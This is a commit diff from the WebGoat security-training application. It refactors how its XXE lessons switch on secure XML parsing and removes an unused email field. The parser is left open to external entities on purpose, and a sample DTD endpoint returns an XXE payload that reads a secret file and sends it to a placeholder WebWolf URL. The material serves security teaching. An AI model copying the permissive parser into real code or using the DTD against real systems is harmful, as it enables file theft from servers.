Move enabling security to WebGoat core and add resetting the lessons.
We can use it for more lessons and showcase how to apply security directly from the source code. Resolves: #1176
This commit is contained in:
Nanne Baars
Nanne Baars
@ -83,11 +83,7 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
|
||||
}
|
||||
|
||||
try {
|
||||
boolean secure = false;
|
||||
if (null != request.getSession().getAttribute("applySecurity")) {
|
||||
secure = true;
|
||||
}
|
||||
Comment comment = comments.parseXml(commentStr, secure);
|
||||
Comment comment = comments.parseXml(commentStr);
|
||||
if (CONTENTS.contains(comment.getText())) {
|
||||
comment.setText("Nice try, you need to send the file to WebWolf");
|
||||
}
|
||||
|
||||
@ -89,11 +89,11 @@ public class Comments {
|
||||
* XmlMapper bean defined above will be used automatically and the Comment class can be directly used in the
|
||||
* controller method (instead of a String)
|
||||
*/
|
||||
protected Comment parseXml(String xml, boolean secure) throws JAXBException, XMLStreamException {
|
||||
protected Comment parseXml(String xml) throws JAXBException, XMLStreamException {
|
||||
var jc = JAXBContext.newInstance(Comment.class);
|
||||
var xif = XMLInputFactory.newInstance();
|
||||
|
||||
if (secure) {
|
||||
if (webSession.isSecurityEnabled()) {
|
||||
xif.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
|
||||
xif.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // compliant
|
||||
}
|
||||
|
||||
@ -68,11 +68,7 @@ public class ContentTypeAssignment extends AssignmentEndpoint {
|
||||
if (null != contentType && contentType.contains(MediaType.APPLICATION_XML_VALUE)) {
|
||||
String error = "";
|
||||
try {
|
||||
boolean secure = false;
|
||||
if (null != request.getSession().getAttribute("applySecurity")) {
|
||||
secure = true;
|
||||
}
|
||||
Comment comment = comments.parseXml(commentStr, secure);
|
||||
Comment comment = comments.parseXml(commentStr);
|
||||
comments.addComment(comment, false);
|
||||
if (checkSolution(comment)) {
|
||||
attackResult = success(this).build();
|
||||
|
||||
@ -30,7 +30,6 @@ import org.owasp.webgoat.assignments.AttackResult;
|
||||
import org.springframework.beans.factory.annotation.Autowired;
|
||||
import org.springframework.beans.factory.annotation.Value;
|
||||
import org.springframework.http.MediaType;
|
||||
import org.springframework.web.bind.annotation.GetMapping;
|
||||
import org.springframework.web.bind.annotation.PostMapping;
|
||||
import org.springframework.web.bind.annotation.RequestBody;
|
||||
import org.springframework.web.bind.annotation.RequestMapping;
|
||||
@ -66,15 +65,10 @@ public class SimpleXXE extends AssignmentEndpoint {
|
||||
|
||||
@PostMapping(path = "xxe/simple", consumes = ALL_VALUE, produces = APPLICATION_JSON_VALUE)
|
||||
@ResponseBody
|
||||
public AttackResult createNewComment(HttpServletRequest request, @RequestBody String commentStr) throws Exception {
|
||||
public AttackResult createNewComment(HttpServletRequest request, @RequestBody String commentStr) {
|
||||
String error = "";
|
||||
try {
|
||||
boolean secure = false;
|
||||
if (null != request.getSession().getAttribute("applySecurity")) {
|
||||
secure = true;
|
||||
}
|
||||
Comment comment = comments.parseXml(commentStr, secure);
|
||||
//System.err.println("Comment " + comment);
|
||||
var comment = comments.parseXml(commentStr);
|
||||
comments.addComment(comment, false);
|
||||
if (checkSolution(comment)) {
|
||||
return success(this).build();
|
||||
@ -103,21 +97,12 @@ public class SimpleXXE extends AssignmentEndpoint {
|
||||
@RequestMapping(path = "/xxe/sampledtd", consumes = ALL_VALUE, produces = MediaType.TEXT_PLAIN_VALUE)
|
||||
@ResponseBody
|
||||
public String getSampleDTDFile() {
|
||||
return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
|
||||
+ "<!ENTITY % file SYSTEM \"file:replace-this-by-webgoat-temp-directory/XXE/secret.txt\">\n"
|
||||
+ "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://replace-this-by-webwolf-base-url/landing?text=%file;'>\">\n"
|
||||
+ "%all;";
|
||||
}
|
||||
|
||||
@GetMapping(path="/xxe/applysecurity",produces=MediaType.TEXT_PLAIN_VALUE)
|
||||
@ResponseBody
|
||||
public String setSecurity(HttpServletRequest request) {
|
||||
|
||||
String applySecurity = (String) request.getSession().getAttribute("applySecurity");
|
||||
if (applySecurity == null) {
|
||||
request.getSession().setAttribute("applySecurity", "true");
|
||||
}
|
||||
return "xxe security patch is now applied, you can try the previous challenges and see the effect!";
|
||||
return """
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!ENTITY % file SYSTEM "file:replace-this-by-webgoat-temp-directory/XXE/secret.txt">
|
||||
<!ENTITY % all "<!ENTITY send SYSTEM 'http://replace-this-by-webwolf-base-url/landing?text=%file;'>">
|
||||
%all;
|
||||
""";
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
@ -29,7 +29,6 @@ public class User {
|
||||
|
||||
private String username = "";
|
||||
private String password = "";
|
||||
private String email = "";
|
||||
|
||||
public String getPassword() {
|
||||
return password;
|
||||
@ -47,12 +46,4 @@ public class User {
|
||||
this.username = username;
|
||||
}
|
||||
|
||||
public String getEmail() {
|
||||
return email;
|
||||
}
|
||||
|
||||
public void setEmail(String email) {
|
||||
this.email = email;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
@ -221,8 +221,8 @@
|
||||
<div class="lesson-page-wrapper">
|
||||
<div class="adoc-content" th:replace="doc:XXE_static_code_analysis.adoc"></div>
|
||||
<br/>
|
||||
<a id="submitlink" class="btn btn-primary" href="" onclick="javascript:$('#patchbutton').load('/WebGoat/xxe/applysecurity');return false;"><span id="patchbutton">Apply XXE security patch</span></a>
|
||||
<a id="submitlink" class="btn btn-primary" href="" onclick="javascript:$('#patchbutton').load('/WebGoat/service/enable-security.mvc');return false;"><span id="patchbutton">Apply XXE security patch</span></a>
|
||||
</div>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
</html>
|
||||
|
||||
Reference in New Issue
Block a user